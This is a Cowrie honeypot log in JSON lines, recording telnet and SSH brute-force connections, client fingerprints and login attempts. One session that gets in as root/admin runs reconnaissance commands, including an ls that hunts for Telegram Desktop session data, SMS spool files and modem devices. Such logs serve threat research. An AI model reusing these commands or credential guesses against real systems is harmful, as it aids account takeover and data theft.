{"eventid":"cowrie.session.closed","duration":12.816474437713623,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:44:27.590912Z","src_ip":"49.156.148.114","session":"ae8fc0f2c945"}
{"eventid":"cowrie.session.closed","duration":12.717921733856201,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:44:34.615514Z","src_ip":"212.227.235.229","session":"64d1f10d38d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38539,"dst_ip":"1.2.3.4","dst_port":23,"session":"1004c0e40906","protocol":"telnet","message":"New connection: 212.227.235.229:38539 (1.2.3.4:23) [session: 1004c0e40906]","sensor":"my-vps","timestamp":"2025-09-08T19:44:34.854419Z"}
{"eventid":"cowrie.session.closed","duration":12.783557415008545,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:44:47.637910Z","src_ip":"212.227.235.229","session":"1004c0e40906"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38877,"dst_ip":"1.2.3.4","dst_port":23,"session":"587e473ae318","protocol":"telnet","message":"New connection: 212.227.235.229:38877 (1.2.3.4:23) [session: 587e473ae318]","sensor":"my-vps","timestamp":"2025-09-08T19:44:47.873308Z"}
{"eventid":"cowrie.session.closed","duration":12.724995613098145,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:45:00.598244Z","src_ip":"212.227.235.229","session":"587e473ae318"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39218,"dst_ip":"1.2.3.4","dst_port":23,"session":"31777913ef2b","protocol":"telnet","message":"New connection: 212.227.235.229:39218 (1.2.3.4:23) [session: 31777913ef2b]","sensor":"my-vps","timestamp":"2025-09-08T19:45:00.818996Z"}
{"eventid":"cowrie.session.closed","duration":12.80364990234375,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:45:13.622579Z","src_ip":"212.227.235.229","session":"31777913ef2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39556,"dst_ip":"1.2.3.4","dst_port":23,"session":"42dd9e14f427","protocol":"telnet","message":"New connection: 212.227.235.229:39556 (1.2.3.4:23) [session: 42dd9e14f427]","sensor":"my-vps","timestamp":"2025-09-08T19:45:13.969523Z"}
{"eventid":"cowrie.session.closed","duration":12.732933282852173,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:45:26.702381Z","src_ip":"212.227.235.229","session":"42dd9e14f427"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39899,"dst_ip":"1.2.3.4","dst_port":23,"session":"db4d83ed744b","protocol":"telnet","message":"New connection: 212.227.235.229:39899 (1.2.3.4:23) [session: db4d83ed744b]","sensor":"my-vps","timestamp":"2025-09-08T19:45:26.900081Z"}
{"eventid":"cowrie.session.closed","duration":12.673524618148804,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:45:39.573540Z","src_ip":"212.227.235.229","session":"db4d83ed744b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47685,"dst_ip":"1.2.3.4","dst_port":23,"session":"7d43f0724c85","protocol":"telnet","message":"New connection: 212.227.125.160:47685 (1.2.3.4:23) [session: 7d43f0724c85]","sensor":"my-vps","timestamp":"2025-09-08T19:45:51.245344Z"}
{"eventid":"cowrie.session.closed","duration":12.59181809425354,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:46:03.837091Z","src_ip":"212.227.125.160","session":"7d43f0724c85"}
{"eventid":"cowrie.session.connect","src_ip":"202.44.242.77","src_port":33642,"dst_ip":"1.2.3.4","dst_port":22,"session":"81a48c57284c","protocol":"ssh","message":"New connection: 202.44.242.77:33642 (1.2.3.4:22) [session: 81a48c57284c]","sensor":"my-vps","timestamp":"2025-09-08T19:47:12.597431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-09-08T19:47:12.598614Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-09-08T19:47:12.798568Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T19:47:16.358637Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:47:17.560149Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:17.976015Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T19:47:17.976696Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-09-08T19:47:17.977549Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:18.177435Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:18.675732Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-09-08T19:47:18.676408Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:18.877861Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:19.328732Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T19:47:19.329402Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:19.529739Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:19.945212Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-09-08T19:47:19.945930Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:20.156312Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:20.655563Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T19:47:20.656216Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:20.856993Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:21.312920Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-09-08T19:47:21.313585Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:21.513925Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:21.928378Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-09-08T19:47:21.929052Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:22.132553Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:22.624804Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-09-08T19:47:22.625473Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:22.858512Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:47:23.274095Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-09-08T19:47:23.274902Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:47:23.475283Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.closed","duration":"56.9","message":"Connection lost after 56.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:48:09.473487Z","src_ip":"202.44.242.77","session":"81a48c57284c"}
{"eventid":"cowrie.session.connect","src_ip":"77.75.56.63","src_port":34158,"dst_ip":"1.2.3.4","dst_port":22,"session":"a58ca0af04fa","protocol":"ssh","message":"New connection: 77.75.56.63:34158 (1.2.3.4:22) [session: a58ca0af04fa]","sensor":"my-vps","timestamp":"2025-09-08T19:50:12.058371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:50:12.059163Z","src_ip":"77.75.56.63","session":"a58ca0af04fa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:50:12.102920Z","src_ip":"77.75.56.63","session":"a58ca0af04fa"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"0","message":"login attempt [hadoop/0] failed","sensor":"my-vps","timestamp":"2025-09-08T19:50:12.310170Z","src_ip":"77.75.56.63","session":"a58ca0af04fa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:50:13.355233Z","src_ip":"77.75.56.63","session":"a58ca0af04fa"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55086,"dst_ip":"1.2.3.4","dst_port":22,"session":"dff7ffc24118","protocol":"ssh","message":"New connection: 217.72.205.35:55086 (1.2.3.4:22) [session: dff7ffc24118]","sensor":"my-vps","timestamp":"2025-09-08T19:50:36.009156Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:50:36.010745Z","src_ip":"217.72.205.35","session":"dff7ffc24118"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.117.69","src_port":54108,"dst_ip":"1.2.3.4","dst_port":22,"session":"c84d3249a3ea","protocol":"ssh","message":"New connection: 14.103.117.69:54108 (1.2.3.4:22) [session: c84d3249a3ea]","sensor":"my-vps","timestamp":"2025-09-08T19:50:37.559407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:50:37.562215Z","src_ip":"14.103.117.69","session":"c84d3249a3ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:50:37.761789Z","src_ip":"14.103.117.69","session":"c84d3249a3ea"}
{"eventid":"cowrie.login.failed","username":"builder","password":"!","message":"login attempt [builder/!] failed","sensor":"my-vps","timestamp":"2025-09-08T19:50:38.554853Z","src_ip":"14.103.117.69","session":"c84d3249a3ea"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:50:39.759128Z","src_ip":"14.103.117.69","session":"c84d3249a3ea"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.89.164","src_port":42886,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a103d927e43","protocol":"ssh","message":"New connection: 101.126.89.164:42886 (1.2.3.4:22) [session: 7a103d927e43]","sensor":"my-vps","timestamp":"2025-09-08T19:50:44.256146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:50:44.271676Z","src_ip":"101.126.89.164","session":"7a103d927e43"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:50:44.487295Z","src_ip":"101.126.89.164","session":"7a103d927e43"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T19:50:45.375319Z","src_ip":"101.126.89.164","session":"7a103d927e43"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:50:46.611459Z","src_ip":"101.126.89.164","session":"7a103d927e43"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55352,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7f7b006cafa","protocol":"ssh","message":"New connection: 212.227.235.229:55352 (1.2.3.4:22) [session: d7f7b006cafa]","sensor":"my-vps","timestamp":"2025-09-08T19:51:22.625625Z"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:51:22.925374Z","src_ip":"212.227.235.229","session":"d7f7b006cafa"}
{"eventid":"cowrie.session.connect","src_ip":"94.182.152.17","src_port":29388,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcae6113808c","protocol":"ssh","message":"New connection: 94.182.152.17:29388 (1.2.3.4:22) [session: dcae6113808c]","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.353346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.354528Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.447752Z","src_ip":"94.182.152.17","session":"dcae6113808c"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":42398,"dst_ip":"1.2.3.4","dst_port":22,"session":"5443b0a35825","protocol":"ssh","message":"New connection: 216.107.136.92:42398 (1.2.3.4:22) [session: 5443b0a35825]","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.674047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T19:52:28.675219Z","src_ip":"216.107.136.92","session":"5443b0a35825"}
